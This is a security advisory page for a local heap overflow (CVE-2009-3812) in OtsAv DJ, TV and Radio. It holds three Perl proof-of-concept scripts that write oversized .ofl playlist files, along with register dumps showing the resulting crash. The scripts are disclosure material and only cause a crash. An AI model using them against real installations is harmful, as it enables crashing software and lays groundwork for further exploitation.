|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 6705 CVE : CVE-2009-3812 CWE : CWE-122 SecurityRisk : High  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : No Exploit Available : Yes
Credit : Stack Published : 28.10.2009
Advisory Content : ----------------------------------the first Poc------------------------------------ #!/usr/bin/perl # OtsAv DJ [.olf] Local Heap Overflow Poc # Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13 JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe # Desc : 7000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # register of 7000 A' # EAX 41414141 # ECX 00E5448C OtsAVDJt.00E5448C # EDX 41414141 # EBX 00E54488 OtsAVDJt.00E54488 # ESP 02C6FE1C # EBP 00E0D328 OtsAVDJt.00E0D328 # ESI 00000000 # EDI 0174C070 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA # EIP 0046266C OtsAVDJt.0046266C # register of 2000 A' # EAX 41414141 # ECX 00001B05 # EDX 02FAF730 # EBX 0000042A # ESP 02FAF9C8 # EBP 00000000 # ESI 020FAFEA # EDI 02FAFEAA # EIP 0043C8D7 OtsAVDJt.0043C8D7 use strict; use warnings; my $A= "\x41" x 7000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist; -------------------------------Second Poc----------------------------------------------------- #!/usr/bin/perl # OtsAv TV [.olf] Local Heap Overflow Poc # Down : http://www.otsav.com/buy/tv/ # Desc : 2000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # EAX 45454545 # ECX 00009AF0 # EDX 03A0F730 # EBX 0000042A # ESP 03A0F9C8 # EBP 00000000 # ESI 02CD7102 # EDI 03A0FEAA # EIP 0043C8D7 OtsAVTVt.0043C8D7 use strict; use warnings; my $A= "\x45" x 2000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist; ----------------------------------- 3 POC------------------------------------------------- #!/usr/bin/perl # OtsAv Radio [.olf] Local Heap Overflow Poc # Down : http://www.otsav.com/buy/radio/ # Desc : 2000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # EAX 45454545 # ECX 0000CD32 # EDX 0224F730 # EBX 00000452 # ESP 0224F9C8 # EBP 00000000 # ESI 00C8E0EA # EDI 0224FED2 # EIP 0043B497 OtsAVRDt.0043B497 use strict; use warnings; my $A= "\x45" x 2000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist; References : http://securityreason.com/expldownload/1/6573/1 (Exploit) http://xforce.iss.net/xforce/xfdb/51628
http://www.vupen.com/english/advisories/2009/1861
http://www.milw0rm.com/exploits/9113
http://secunia.com/advisories/35738
http://packetstormsecurity.org/0907-exploits/otsav-overflow.txt
http://osvdb.org/55747  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |